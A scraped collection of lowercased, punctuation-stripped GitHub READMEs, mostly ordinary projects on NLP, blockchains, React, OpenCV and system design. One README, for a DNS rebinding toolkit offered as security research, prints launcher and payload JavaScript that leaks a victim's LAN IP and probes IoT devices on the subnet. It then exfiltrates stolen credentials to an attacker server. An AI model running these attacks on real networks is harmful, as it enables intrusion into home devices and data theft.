or appended default prepend behavior prepend append presets js svelte config js import presetcarbon from carbon preprocess svelte export default preprocess presetcarbon if using other preprocessors preprocess presetcarbon sample sveltekit set up js svelte config js import adapter from sveltejs adapter static import optimizeimports optimizecss from carbon preprocess svelte type import sveltejs kit config export default preprocess optimizeimports kit adapter adapter vite plugins process env node env production optimizecss contributing refer to the contributing guidelines contributing md license apache 2 0 license npm https img shields io npm v carbon preprocess svelte svg color 262626 style for the badge npm url https npmjs com package carbon preprocess svelte
svelte svelte-preprocessor preprocess carbon carbon-design-system carbon-preprocess
os
AIND-NLP
aind natural language processing coding exercises for the natural language processing concentration part of udacity s artificial intelligence nanodegree program setup you need python 3 6 and the packages mentioned in requirements txt you can install them using bash pip install r requirements txt data data files for exercises are included under data but some of the nlp libraries require additional data for performing tasks like pos tagging lemmatization etc specifically nltk will throw an error if the required data is not installed you can use the following python statement to open the nltk downloader and select the desired package s to install python nltk download you can also download all available nltk data packages which includes a number of sample corpora as well but that may take a while 10 gb run to run any script file use bash python script py to open a notebook use bash jupyter notebook notebook ipynb a rel license href http creativecommons org licenses by nc nd 4 0 img alt creative commons license style border width 0 src https i creativecommons org l by nc nd 4 0 88x31 png a br this work is licensed under a a rel license href http creativecommons org licenses by nc nd 4 0 creative commons attribution noncommercial noderivatives 4 0 international license a please refer to udacity terms of service https www udacity com legal for further information
natural-language-processing nlp artificial-intelligence machine-learning udacity nanodegree
ai
postgresql_etl
p align center img src images postgres png style height 25 width 25 max width 30px p project overview this project is an excercise for data modeling with postgres and building an etl pipeline using python fact and dimension tables for a star schema is defined and an etl pipeline is written to transfer data from files in two local directories into tables in postgres using python and sql the dataset is a simulated dataset of a spotify like startup it includes songplay logs song details and artist details the data is modeled using a star scheme with 1 fact table songplays and 4 dimension tables users songs artists and time libraries used the following libraries are used in this project postgresql psycopg2 pydata pandas utilities glob os how to run run create tables py to initialize or drop previous database and create empty tables run etl py to utilize etl pipeline to extra data from files to database use test ipynb to query database files description create tables py drops existing database and tables and creates new database and tables etl ipynb a walkthrough template with detailed instructions for creating the etl py file etl py a etl pipeline that extracts data from files to database and create 5 tables songplays users songs artists and time sql queries py containing sql commands to drop and create tables insert records and query database test ipynb a jupiter notebook with magic commands to query database acknowledgement credits to udacity for the templates
server
ixo-blockchain
ixo blockchain github release latest by date https img shields io github v release ixofoundation ixo blockchain color white label release style flat square https github com ixofoundation ixo blockchain releases latest github release date https img shields io github release date ixofoundation ixo blockchain label date color white style flat square github release latest by date including pre releases https img shields io github v release ixofoundation ixo blockchain color 00d2ff include prereleases label candidate style flat square https github com ixofoundation ixo blockchain releases github license https img shields io github license ixofoundation ixo blockchain color lightgrey style flat square https github com ixofoundation ixo blockchain blob main license github go mod go version https img shields io github go mod go version ixofoundation ixo blockchain color lightgrey style flat square github repo size https img shields io github repo size ixofoundation ixo blockchain color lightgrey style flat square go report card https goreportcard com badge github com ixofoundation ixo blockchain https goreportcard com report github com ixofoundation ixo blockchain discord https img shields io badge discord 7289da style for the badge logo discord logocolor white https discord com invite ixo telegram https img shields io badge telegram 2ca5e0 style for the badge logo telegram logocolor white https t me ixonetwork twitter https img shields io badge twitter 1da1f2 style for the badge logo twitter logocolor white https twitter com ixoworld medium https img shields io badge medium 12100e style for the badge logo medium logocolor white https medium com ixo blog p align center img src github assets readme banner png p br the ixo blockchain is a layer 1 blockchain that runs on both testnet and mainnet it is built using the cosmos sdk https docs cosmos network main tendermint https docs tendermint com and ibc https ibc cosmos network and was one of the earliest networks to incorporate these technologies the recent addition of cosmwasm https github com cosmwasm wasmd in v0 19 3 demonstrates ixo s commitment to ongoing innovation and evolution have a look at go mod https github com ixofoundation ixo blockchain blob main go mod for specific dependencies and their most recent versions the ixo blockchain powers client applications for coordinating financing and verifying impacts the impacts wallet https github com ixofoundation ixo mobile dev jambo https github com ixofoundation jambo and launchpad https github com ixofoundation ixo webclient are examples of client applications that use the ixo blockchain the impacts sdk https www npmjs com package ixo impactxclient sdk makes it simple to interact with the ixo blockchain how to contribute if you are interested in contributing to the ixo blockchain you can start by reviewing the documentation on our website https docs ixo foundation ixo developers there are many opportunities to get involved such as contributing code or participating in community discussions our community is passionate about using blockchain technology to create positive impacts in the world we believe in the power of collaboration and innovation to drive change and we welcome anyone who shares our vision to join us on discord or telegram
golang
blockchain
front-end-developer-challenge
front end developer challenge in this repo you will find a mock up and all the necessary assets in a separate folder the design is of a tool for a fictitious game called titanstar legends and will not be repurposed or otherwise utilized by d d beyond it is only a coding challenge below are specific requirements we have which cannot be adequately expressed through the mock up this is not a timed assignment but it should probably take a couple of hours when you re done submit a link to your test s github repository we ask that you have your assessment completed and returned within 7 days of receiving it good luck if you feel that you have a personal project that closely resembles this project send us the repo and we ll evaluate that project instead only your contributions will be evaluated and the project must demonstrate the following competencies with making an app mobile friendly responsive creating and utilizing modern styling creating a stateful js application assessment expectations code reviewers will be directed to pay special attention to the following styles of submission match the provided mock all functionality defined above is present in the submission code organisation and maintainability if a js framework is used are that libraries best practices followed any novel or additional features beyond the given scope you may utilize scss less css modules css in js to create necessary styles but please avoid utilizing any frameworks or libraries that are already styled you may utilize a reset or normalize file if you would like rune mastery loadout talent calculator 9000 players of titanstar legends can spend talent points that they ve collected on runes within a tree we need to write a js application that simulates the rune tree within the game so players can replicate their in game loadouts to share with the titanstar legends community example assets example png left click to add points right click to remove points the user may only use up to 6 points each item only accounts for one point displays current point total the user must select the items in order for example the user may not put a point in the cake without first having put points in the chevrons and the silverware in that order
coding-challenge dndbeyond
front_end
DriveLikeAHuman
drive like a human static badge https img shields io badge arxiv pdf 8a2be2 logo arxiv https arxiv org abs 2307 07162 hugging face spaces https img shields io badge f0 9f a4 97 20hugging 20face live demo blue https huggingface co spaces wayne lc drive like human static badge https img shields io badge homepage drive like a human 00cec9 drive like a human rethinking autonomous driving with large language models news try out our web demo on hugging face https huggingface co spaces wayne lc drive like human without any deployment closed loop interaction ability in driving scenarios https github com pjlab adg drivelikeahuman assets 18390668 0ec8e901 9dc1 4c89 81d6 994309a49630 img assets closeloop png pre requirement bash pip install highway env pip install r requirements txt running hellm py allows you to experience llm s closed loop driving in highwayenv first you need to modify config yaml to configure your llm yaml openai api type azure azure or openai for openai openai key sk xxxxxxxxxxx your openai key for azure azure model xxxxx your deploment model name azure api base https xxxxxxxx openai azure com your deployment endpoint azure api key xxxxxx your deployment key azure api version 2023 03 15 preview we use gpt 3 5 recommended the models with 8k max token as the default llm but you can also refer to langchain large language models https python langchain com docs modules model io models to define your own llm in this case you need to modify lines 24 40 of hellm py to configure your own llm python if openai config openai api type azure os environ openai api type openai config openai api type os environ openai api version openai config azure api version os environ openai api base openai config azure api base os environ openai api key openai config azure api key llm azurechatopenai deployment name openai config azure model temperature 0 max tokens 1024 request timeout 60 elif openai config openai api type openai os environ openai api key openai config openai key llm chatopenai temperature 0 model name gpt 3 5 turbo 16k 0613 or any other model with 8k context max tokens 1024 request timeout 60 then by running python hellm py you can see the process of llm making decisions using tools img assets close loop case 1 png img assets close loop case 2 png reasoning ability with common sense try it with your own image in hugging face https huggingface co spaces wayne lc drive like human or deploy your own with this notebook casereasoning ipynb img assets reasoning 1 png img assets reasoning 2 png performance enhancement through memorization ability img assets memorization png cite misc fu2023drive title drive like a human rethinking autonomous driving with large language models author daocheng fu and xin li and licheng wen and min dou and pinlong cai and botian shi and yu qiao year 2023 eprint 2307 07162 archiveprefix arxiv primaryclass cs ro acknowledgments we would like to thank the authors and developers of the following projects this project is built upon these great open sourced projects highway env https github com farama foundation highwayenv langchain https github com hwchase17 langchain llama adapter https github com opengvlab llama adapter contact if you have any questions please report issues on github
ai
ComputerVisionPractice
computervisionpratiace imageprocessing 1 imageprocessing 1 opencv 1 roi cv https www cnblogs com wj 1314 p 11881270 html imageprocessing 2 imageprocessing 2 opencv 2 mask https www cnblogs com wj 1314 p 9592346 html imageprocessing 3 imageprocessing 3 opencv 3 https www cnblogs com wj 1314 p 13043794 html imageprocessing 4 imageprocessing 4 opencv 4 https www cnblogs com wj 1314 p 11693364 html imageprocessing 5 imageprocessing 5 opencv 5 https www cnblogs com wj 1314 p 12084636 html imageprocessing 6 imageprocessing 6 opencv 6 sobel scharr laplacian canny https www cnblogs com wj 1314 p 9800272 html imageprocessing 7 imageprocessing 7 opencv 7 https www cnblogs com wj 1314 p 11981974 html imageprocessing 8 imageprocessing 8 opencv 8 https www cnblogs com wj 1314 p 11510789 html imageprocessing 9 imageprocessing 9 opencv 9 https www cnblogs com wj 1314 p 9444056 html imageprocessing 10 imageprocessing 10 opencv 10 https www cnblogs com wj 1314 p 11983496 html imageprocessing 11 imageprocessing 11 opencv 11 https www cnblogs com wj 1314 p 12166917 html imageprocessing 12 imageprocessing 12 opencv 12 k means https www cnblogs com wj 1314 p 12191084 html imageprocessing 13 imageprocessing 13 opencv 13 harris sift https www cnblogs com wj 1314 p 13364875 html imageprocessing 14 imageprocessing 14 opencv 14 png jpg bmp opencv mask https www cnblogs com wj 1314 p 17507400 html opencv imageprocessingpractice1 imageprocessingpractice1 opencv 1 ocr opencv https www cnblogs com wj 1314 p 9472962 html imageprocessingpractice2 imageprocessingpractice2 opencv 2 https www cnblogs com wj 1314 p 9578493 html imageprocessingpractice3 imageprocessingpractice3 tensorflow opencv 3 python https www cnblogs com wj 1314 p 11331708 html imageprocessingpractice4 imageprocessingpractice4 opencv 4 ocr ocr https www cnblogs com wj 1314 p 11975977 html visionpro cognex visionpro share share opencv visionpro 1 visionpro 1 https www cnblogs com wj 1314 p 11975977 html https www cnblogs com wj 1314 p 17121301 html visionpro 2 visionpro 2 imagecoverttool https www cnblogs com wj 1314 p 17504248 html visionpro 3 visionpro 3 beadinspecttool https www cnblogs com wj 1314 p 11323013 html visionpro 4 visionpro 4 patinspect https www cnblogs com wj 1314 p 10769155 html
computer-vision opencv-python
ai
cs224n
stanford cs 224n natural language processing with deep learning self study on stanford cs 224n winter 2020 special thanks to stanford and professor chris manning for making this great resources online and free to the public no access to autograder thus no guarantee that the solutions are correct lecture videos cs 224n winter 2019 https www youtube com playlist list ploromvodv4rohcuxmzknm7j3fvwbby42z lecture slides cs 224n winter 2019 slides lecture notes cs 224n winter 2019 notes assignment 1 heavy check mark constructed count vectorized embeddings using co occurance matrix and used gensim word2vec to study predictions and language biases assignment 2 heavy check mark implemented and trained word2vec in numpy written understanding word2vec a2 a2 written pdf coding implementing word2vec a2 readme md word vectors a2 word vectors png assignment 3 heavy check mark written and coding a3 readme md assignment 4 heavy check mark coding neural machine translation with rnn a4 readme md left local windows 10 machine with rtx 2080 ti training overnight hit early stopping at around 11 hours test bleu score 35 89 train a4 outputs train png test a4 outputs test png written analyzing nmt systems a4 a4 written pdf assignment 5 public heavy check mark trained using batch size 64 vs default 32 and set max epoch 60 vs default 30 on a local rtx 2080 ti gpu memory at 10 11gb training reached maximum number of epochs after 34 hours with training loss at the low 70s and validation perplexity at 59 average words per second is around 2000 words per second test bleu score 27 96 coding neural machine translation with rnn a5 public readme md train a5 public assets training2 png test a5 public assets test2 png written neural machine translation with rnn a5 public a5 written pdf license all slides notes assignments and provided code scaffolds are owned by stanford university
natural-language-processing stanford-nlp stanford cs224n 2020 cs224n-assignment-solutions cs224nwinter2020 pytorch
ai
TensorFlow-Book
machine learning with tensorflow http www tensorflowbook com this https github com binroot tensorflow book is the official code repository for machine learning with tensorflow http www tensorflowbook com get started with machine learning using tensorflow google s latest and greatest machine learning library summary chapter 2 https github com binroot tensorflow book tree master ch02 basics tensorflow basics concept 1 defining tensors concept 2 evaluating ops concept 3 interactive session concept 4 session loggings concept 5 variables concept 6 saving variables concept 7 loading variables concept 8 tensorboard chapter 3 https github com binroot tensorflow book tree master ch03 regression regression concept 1 linear regression concept 2 polynomial regression concept 3 regularization chapter 4 https github com binroot tensorflow book tree master ch04 classification classification concept 1 linear regression for classification concept 2 logistic regression concept 3 2d logistic regression concept 4 softmax classification chapter 5 https github com binroot tensorflow book tree master ch05 clustering clustering concept 1 clustering concept 2 segmentation concept 3 self organizing map chapter 6 https github com binroot tensorflow book tree master ch06 hmm hidden markov models concept 1 forward algorithm concept 2 viterbi decode chapter 7 https github com binroot tensorflow book tree master ch07 autoencoder autoencoders concept 1 autoencoder concept 2 applying an autoencoder to images concept 3 denoising autoencoder chapter 8 https github com binroot tensorflow book tree master ch08 rl reinforcement learning concept 1 reinforcement learning chapter 9 https github com binroot tensorflow book tree master ch09 cnn convolutional neural networks concept 1 using cifar 10 dataset concept 2 convolutions concept 3 convolutional neural network chapter 10 https github com binroot tensorflow book tree master ch10 rnn recurrent neural network concept 1 loading timeseries data concept 2 recurrent neural networks concept 3 applying rnn to real world data for timeseries prediction chapter 11 https github com binroot tensorflow book tree master ch11 seq2seq seq2seq model concept 1 multi cell rnn concept 2 embedding lookup concept 3 seq2seq model chapter 12 https github com binroot tensorflow book tree master ch12 rank ranking concept 1 ranknet concept 2 image embedding concept 3 image ranking
tensorflow machine-learning regression convolutional-neural-networks logistic-regression book reinforcement-learning autoencoder linear-regression classification clustering
ai
RUPP_WCT
rupp wct royal university of phnom penh bachelor of it engineering year 3 semester 1 course web cloud technology
cloud
To-Do-List
to do list a todo list web app which can be used to keep tracks of your tasks and stay productive i created this while learning backend web development using node express and mongodb
server
system-design-bangla
p align center img src images system design wallpaper png alt system design wallpaper p https www buymeacoffee com lahin31 section 1 system design section 1 system design section 2 database sql and nosql section 2 database sql and nosql section 3 client server architecture section 3 client server architecture section 4 reliability section 4 reliability section 5 performance metrics section 5 performance metrics section 6 distributed system section 6 distributed system section 7 domain name system section 7 domain name system section 8 http and https section 8 http and https section 9 functional and non functional requirements section 9 functional and non functional requirements section 10 back of the envelope estimation section 10 back of the envelope estimation section 11 stateful and stateless architecture section 11 stateful and stateless architecture section 12 proxy section 12 proxy section 13 rest api section 13 rest api section 14 scalability section 14 scalability section 15 database sharding section 15 database sharding section 16 database replication section 16 database replication section 17 caching section 17 caching section 18 content delivery network section 18 content delivery network section 19 cap theorem section 19 cap theorem section 20 consistent hashing section 21 polling and streaming section 21 polling and streaming section 22 distributed messaging system section 23 how live streaming works section 24 how oauth2 works section 25 design url shortener section 26 design a rate limiter section 27 design a chat system section 28 design a notification system section 29 design high availability resilience system section 30 how discord stores trillions of messages section 31 how grab stores and processes millions of orders daily section 32 resources section 32 resources section 1 system design section 2 database sql and nosql sql nosql sql nosql relation relation key value graph document nosql sections database readme md section 3 client server architecture p align center img src images csa png alt client server architecture p section 4 reliability fault error reliable fault failure fault user failure warning message reliable sections reliability readme md section 5 performance metrics throughput throughput api request throughput time to first byte resource request first byte of response request first byte time to first byte sections performance metrics readme md section 6 distributed system end user shared state concurrently information distributed system youtube youtube user video upload video watch distributed system youtube section 7 domain name system domain name system dns human readable domain www google com ip url www google com dns url ip address ip address dns resolver dns resolver human readable domain ip root server com org net ip dns resolver com com ip org org ip top level domain server top level domain www google com tld com authorititve server authorititve server human readable domain www google com ip p align center img src images dns png alt dns p section 8 http and https http hypertext transfer protocol http web browser web server communication set of rules text image section 9 functional and non functional requirements functional requirements functional requirement functional requirement non functional requirements quality characteristics performance security cost scalability reliability non functional requirement section 10 back of the envelope estimation load balancer cdn sections back of the envelop estimation readme md section 11 stateful and stateless architecture stateful store maintain application fttp stateful stateful web socket web socket bidirectional full duplex protocol server store client server stateless store maintain application database cache http stateless http stateless architecture protected resource request cookie token server cookie token sections stateless stateful architecture readme md section 12 proxy nginx sections proxy readme md section 13 rest api rest api rest rest representational state transfer rest api http methods get post put patch delete rest api sections rest api readme md section 14 scalability 2 vertical scalability horizontal scalability sections scalability readme md section 15 database sharding database sharding row row shard distribute database sharding p align center img src images sharding png alt sharding p sections database sharding readme md section 16 database replication database replication strategy master database slave database master database insert delete update slave database master database copy read operation p align center img src images db replication png alt database replication p database replication sql nosql sections db replication readme md section 17 caching caching expensive response read api fast latency reduce fault tolarence p align center img src images caching1 png alt caching p sections caching readme md section 18 content delivery network content delivery network cdn js css images videos p align center img src images cdn 1 png alt cdn p cdn india bangladesh content request content latency bangladesh england request latency cdn point of presence pop pop edge server sections cdn readme md section 19 cap theorem distributed database system c consistency a availability p partition tolerance consistency transection consistent value availability read write process message request process partition tolerance connection read write sections cap theorem readme md section 21 polling and streaming polling client regular interval server p align center img src images polling png alt polling p streaming socket disconnect event streaming chat application p align center img src images streaming png alt streaming p sections polling and streaming readme md section 32 resources a href https github com donnemartin system design primer target blank system design primer by donne martin free a a href https www amazon com designing data intensive applications reliable maintainable dp 1449373321 target blank designing data intensive pplications paid a a href amazon com system design interview insiders guide dp 1736049119 target blank system design interview by alex xu paid a
os
reliabel.github.io
this project was bootstrapped with create react app https github com facebook create react app available scripts in the project directory you can run npm start runs the app in the development mode br open http localhost 3000 http localhost 3000 to view it in the browser the page will reload if you make edits br you will also see any lint errors in the console npm test launches the test runner in the interactive watch mode br see the section about running tests https facebook github io create react app docs running tests for more information npm run build builds the app for production to the build folder br it correctly bundles react in production mode and optimizes the build for the best performance the build is minified and the filenames include the hashes br your app is ready to be deployed see the section about deployment https facebook github io create react app docs deployment for more information npm run eject note this is a one way operation once you eject you can t go back if you aren t satisfied with the build tool and configuration choices you can eject at any time this command will remove the single build dependency from your project instead it will copy all the configuration files and the transitive dependencies webpack babel eslint etc right into your project so you have full control over them all of the commands except eject will still work but they will point to the copied scripts so you can tweak them at this point you re on your own you don t have to ever use eject the curated feature set is suitable for small and middle deployments and you shouldn t feel obligated to use this feature however we understand that this tool wouldn t be useful if you couldn t customize it when you are ready for it learn more you can learn more in the create react app documentation https facebook github io create react app docs getting started to learn react check out the react documentation https reactjs org code splitting this section has moved here https facebook github io create react app docs code splitting analyzing the bundle size this section has moved here https facebook github io create react app docs analyzing the bundle size making a progressive web app this section has moved here https facebook github io create react app docs making a progressive web app advanced configuration this section has moved here https facebook github io create react app docs advanced configuration deployment this section has moved here https facebook github io create react app docs deployment npm run build fails to minify this section has moved here https facebook github io create react app docs troubleshooting npm run build fails to minify
server
dns-rebind-toolkit
dns rebind toolkit demo http rebind network security advisory https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 included payloads payloads readme md faq faq md disclaimer this software is for educational purposes only this software should not be used for illegal activity the author is not responsible for its use don t be a dick dns rebind toolkit is a frontend javascript framework for developing dns rebinding https en wikipedia org wiki dns rebinding exploits against vulnerable hosts and services on a local area network lan it can be used to target devices like google home roku sonos wifi speakers wifi routers smart thermostats and other iot devices with this toolkit a remote attacker can bypass a router s firewall and directly interact with devices on the victim s home network exfiltrating private information and in some cases even controlling the vulnerable devices themselves the attack requires a victim on the target network to simply follow a link or be shown an html ad containing a malicious iframe from their the victim s web browser is used like a proxy to directly access other hosts connected to their home network these target machines and services would otherwise be unavailable to the attacker from the internet the remote attacker may not know what those services are or what ip addresses they occupy on the victim s network but dns rebind toolkit handles this by brute forcing hundreds of likely ip addresses under the hood this tool makes use of a public whonow dns server https github com brannondorsey whonow running on rebind network 53 to execute the dns rebinding attack and fool the victim s web browser into violating the same origin policy https en wikipedia org wiki same origin policy from their it uses webrtc https en wikipedia org wiki webrtc to leak the victim s private ip address say 192 168 1 36 it uses the first three octets of this local ip address to guess the network s subnet and then inject 256 iframes from 192 168 1 0 255 delivering a payload to each host that could possibly be on the network subnet this toolkit can be used to develop and deploy your own dns rebinding attacks several real world attack payloads are included with this toolkit in the payloads payloads directory these payloads include information exfiltration and rickroll tom foolery attacks against a few popular iot devices including google home and roku products this toolkit is the product of independent security research into dns rebinding attacks you can read about that original research here https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 getting started bash clone the repo git clone https github com brannondorsey dns rebind toolkit git cd dns rebind toolkit install dependencies npm install run the server using root to provide access to privileged port 80 this script serves files from the www examples share and payloads directories sudo node server by default server js serves payloads targeting google home roku sonos speakers phillips hue light bulbs and radio thermostat devices running their services on ports 8008 8060 1400 80 and 80 respectively if you ve got one of these devices on your home network navigate to http rebind network for a nice surprise open the developer s console and watch as these services are harmlessly exploited causing data to be stolen from them and exfiltrated to server js api and usage this toolkit provides two javascript objects that can be used together to create dns rebinding attacks dnsrebindattack share js dnsrebindattack js this object is used to launch an attack against a vulnerable service running on a known port it spawns one payload for each ip address you choose to target dnsrebindattack objects are used to create manage and communicate with multiple dnsrebindnode objects each payload launched by dnsrebindattack must contain a dnsrebindnode object dnsrebindnode share js dnsrebindnode js this static class object should be included in each html payload file it is used to target one service running on one host it can communicate with the dnsrebindattack object that spawned it and it has helper functions to execute the dns rebinding attack using dnsrebindnode rebind as well as exfiltrate data discovered during the attack to server js dnsrebindnode exfiltrate these two scripts are used together to execute an attack against unknown hosts on a firewall protected lan a basic attack looks like this 1 attacker sends victim a link to a malicious html page that launches the attack e g http example com launcher html launcher html contains an instance of dnsrebindattack 2 the victim follows the attacker s link or visits a page where http example com launcher html is embedded as an iframe this causes the dnsrebindattack on launcher html to begin the attack 3 dnsrebindattack uses a webrtc leak https github com diafygi webrtc ips to discover the local ip address of the victim machine e g 192 168 10 84 the attacker uses this information to choose a range of ip addresses to target on the victim s lan e g 192 168 10 0 255 4 launcher html launches the dns rebinding attack using dnsrebindattack attack against a range of ip addresses on the victim s subnet targeting a single service e g the undocumented google home rest api https rithvikvibhu github io ghlocalapi available on port 8008 5 at an interval defined by the user 200 milliseconds by default dnsrebindattack embeds one iframe containing payload html into the launcher html page each iframe contains one dnsrebindnode object that executes an attack against port 8008 of a single host defined in the range of ip addresses being attacked this injection process continues until an iframe has been injected for each ip address that is being targeted by the attack 6 each injected payload html file uses dnsrebindnode to attempt a rebind attack by communicating with a whonow dns server https github com brannondorsey whonow if it succeeds same origin policy is violated and payload html can communicate with the google home product directly usually payload html will be written in such a way that it makes a few api calls to the target device and exfiltrates the results to server js running on example com before finishing the attack and destroying itself note if a user has one google home device on their network with an unknown ip address and an attack is launched against the entire 192 168 1 0 24 subnet then one dnsrebindnode s rebind attack will be successful and 254 will fail examples an attack consists of three coordinated scripts and files an html file containing an instance of dnsrebindattack e g launcher html an html file containing the attack payload e g payload html this file is embedded into launcher html by dnsrebindattack for each ip address being targetted a dns rebinding toolkit server server js to deliver the above files and exfiltrate data if need be launcher html here is an example html launcher file you can find the complete document in examples launcher html examples launcher html html doctype html head title example launcher title head body this script is a depency of dnsrebindattack js and must be included script type text javascript src share js eventemitter js script include the dns rebind attack object script type text javascript src share js dnsrebindattack js script script type text javascript dnsrebindattack has a static method that uses webrtc to leak the browser s ip address on the lan we ll use this to guess the lan s ip subnet if the local ip is 192 168 1 89 we ll launch 255 iframes targetting all ip addresses from 192 168 1 1 255 dnsrebindattack getlocalipaddress then ip launchrebindattack ip catch err console error err looks like our nifty webrtc leak trick didn t work doesn t work in some browsers no biggie most home networks are 192 168 1 1 24 launchrebindattack 192 168 1 1 function launchrebindattack localip convert 192 168 1 1 into array from 192 168 1 0 192 168 1 255 const first3octets localip substring 0 localip lastindexof const ips array 256 keys map octet first3octets octet the first argument is the domain name of a publicly accessible whonow server https github com brannondorsey whonow i ve got one running on port 53 of rebind network you can to use the services you are attacking might not be running on port 80 so you will probably want to change that too const rebind new dnsrebindattack rebind network 80 launch a dns rebind attack spawning 255 iframes attacking the service on each host of the subnet or so we hope arguments are 1 target ip addresses 2 ip address your node server js is running on usually 127 0 0 1 during dev but then the publicly accessible ip not hostname of the vps hosting this repo in production 3 the html payload to deliver to this service this html file should have a dnsrebindnode instance implemented on in it 4 the interval in milliseconds to wait between each new iframe embed spawning 100 iframes at the same time can choke or crash a browser the higher this value the longer the attack takes but the less resources it consumes rebind attack ips 127 0 0 1 examples payload html 200 rebind nodes is also an eventemitter only this one is fired using dnsrebindnode emit this allows dnsrebindnodes inside of iframes to post messages back to the parent dnsrebindattack that launched them you can define custome events by simply emitting dnsrebindnode emit my custom event and a listener in rebind nodes can receive it that said there are a few standard event names that get triggered automagically begin triggered when dnsrebindnode js is loaded this signifies that an attack has been launched or at least it s payload was delivered against an ip address rebind the dns rebind was successful this node should now be communicating with the target service exfiltrate send json data back to your node server js and save it inside the data folder additionally the dnsrebindnode destroy static method will trigger the destory event and cause dnsrebindattack to remove the iframe rebind nodes on begin ip the dnsrebindnode has been loaded attacking ip rebind nodes on rebind ip the rebind was successful console log node rebind ip rebind nodes on exfiltrate ip data json data was exfiltrated and saved to the data folder on the remote machine hosting server js console log node exfiltrate ip data data username crashoverride password hacktheplanet script body html payload html here is an example html payload file you can find the complete document in examples payload html examples payload html html doctype html html head title example payload title head body load the dnsrebindnode this static class is used to launch the rebind attack and communicate with the dnsrebindattack instance in example launcher html script type text javascript src share js dnsrebindnode js script script type text javascript attack then err there was an error at some point during the attack console error err dnsrebindnode emit fatal err message remove this iframe by calling destroy then dnsrebindnode destroy launches the attack and returns a promise that is resolved if the target service is found and correctly exploited or more likely rejected because this host doesn t exist the target service isn t running or something went wrong with the exploit remember that this attack is being launched against 255 ip addresses so most of them won t succeed async function attack dnsrebindnode has some default fetch options that specify things like no caching etc you can re use them for convenience or ignore them and create your own options object for each fetch request here are their default values method get headers this doesn t work in all browsers for instance firefox doesn t let you do this origin unset the origin header pragma no cache cache control no cache cache no cache const getoptions dnsrebindnode fetchoptions try in this example we ll pretend we are attacking some service with an auth json file with username password sitting in plaintext before we swipe those creds we need to first perform the rebind attack most likely our webserver will cache the dns results for this page s host dnsrebindnode rebind recursively re attempts to rebind the host with a new target ip address this can take over a minute and if it is unsuccessful the promise is rejected const opts these options get passed to the dns rebind fetch request fetchoptions getoptions by default dnsrebindnode rebind is considered successful if it receives an http 200 ok response from the target service however you can define any kind of rebind success scenario yourself with the successpredicate function this function receives a fetch result as a parameter and the return value determines if the rebind was successful i e you are communicating with the target server here we check to see if the fetchresult was sent by our example vulnerable server successpredicate fetchresult return fetchresult headers get server example vulnerable server v1 0 await the rebind can take up to over a minute depending on the victim s dns cache settings or if there is no host listening on the other side await dnsrebindnode rebind http location host auth json opts catch err whoops the rebind failed either the browser s dns cache was never cleared or more likely this service isn t running on the target host oh well bubble up the rejection and have our attack s rejection handler deal w it return promise reject err try alrighty now that we ve rebound the host and are communicating with the target service let s grab the credentials const creds await fetch http location host auth json then res res json username crashoverride password hacktheplanet console log creds great now let s exfiltrate those creds to the node js server running this whole shebang that s the last thing we care about so we will just return this promise as the result of attack and let its handler s deal with it note the second argument to exfiltrate must be json serializable return dnsrebindnode exfiltrate auth example creds catch err return promise reject err script body html server js this script is used to deliver the launcher html and payload html files as well as receive and save exifltrated data from the dnsrebindnode to the data folder for development i usually run this server on localhost and point dnsrebindattack attack towards 127 0 0 1 for production i run the server on a vps cloud server and point dnsrebindattack attack to its public ip address bash run with admin privileged so that it can open port 80 sudo node server usage server h v p port dns rebind toolkit server optional arguments h help show this help message and exit v version show program s version number and exit p port port port which ports to bind the servers on may include multiple like port 80 port 1337 default p 80 p 8008 p 8060 p 1337 more examples i ve included an example vulnerable server in examples vulnerable server js this vulnerable service must be run from another machine on your network as it s port must match the same port as server js to run this example attack yourself do the following secondary computer bash clone the repo git clone https github com brannondorsey dns rebind toolkit cd dns rebind toolkit launch the vulnerable server node examples vulnerable server vulnerable server is listening on 3000 primary computer node server port 3000 now navigate your browser to http localhost 3000 launcher html and open a dev console wait a minute or two if the attack worked you should see some dumped credz from the vulnerable server running on the secondary computer check out the examples and payloads directories for more examples files and directories server js the dns rebind toolkit server payloads several html payload files hand crafted to target a few vulnerable iot devices includes attacks against google home roku and radio thermostat for now i would love to see more payloads added to this repo in the future prs welcome examples example usage files data directory where data exfiltrated by dnsrebindnode exfiltrate is saved share directory of javascript files shared by multiple html files in examples and payload this toolkit was developed to be a useful tool for researchers and penetration testers if you d like to see some of the research that led to it s creation check out this post https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 if you write a payload for another service consider making a pr to this repository so that others can benefit from your work
dns-rebinding dns hacking red-team network-attacks iot iot-security
front_end
hive
hive decentralizing the exchange of ideas and information hive https files peakd com file peakd hive netuoso jmhldwmv horizontal png hive is a graphene based social blockchain that was created as a fork of steem and born on the core idea of decentralization originally hive was announced on the steem blockchain https peakd com communityfork hiveio announcing the launch of hive blockchain prior to the initial token airdrop hive did not have any ico or mining period the hive blockchain removes the elements of centralization and imbalanced control that plagued the steem blockchain since it s launch on march 20 2020 hive is growing and evolving day by day hive s prime selling points are its decentralization 3 second transaction speed and ability to handle large volumes it is ideal real estate for a variety of innovative projects focused on a broad range of fields from open source development to games hive serves as the operational home for all kinds of projects companies and applications having a highly active and passionate community hive has become a thriving atmosphere for new and experienced developers to quickly bootstrap their applications on top of this hive is extremely rewarding to content creators and curators alike the technical development of the hive blockchain itself is carried out by the founding decentralized group of over 30 open source developers many of whom were instrumental in creating steem back in 2016 and supported by a growing community of additional open source developers and witnesses documents developer portal https developers hive io advantages hive fund truly decentralized community free transactions resource credits freemium model fast block confirmations 3 seconds time delay security vested hive savings hierarchical role based permissions keys integrated token allocation lowest entry barrier for user adoption in the market dozens of dapps already built on hive and many more to come technical details currency symbol hive hbd hive s very own stable coin with a two way peg delegated proof of stake consensus dpos 10 apr inflation narrowing to 1 apr over 20 years 65 of inflation to authors curators 15 of inflation to stakeholders 10 of inflation to block producers 10 of inflation to hive fund installation getting started with hive is fairly simple you can either choose to use pre built docker images build with docker manually or build from source directly all steps have been documented and while many different os are supported the easiest one is ubuntu 22 04 lts quickstart just want to get up and running quickly we have pre built docker images for your convenience more details are in our quickstart guide doc exchangequickstart md building we strongly recommend using one of the pre built docker images or using docker to build hive both of these processes are described in the quickstart guide doc exchangequickstart md but if you would still like to build from source we also have build instructions doc building md for linux ubuntu lts dockerized deployment building a hived docker image is described here building under docker doc building md building under docker if you d like to use our already pre built official binary images it s as simple as downloading it from the dockerhub registry with only one command docker pull hiveio hive a script is available that wraps a docker run 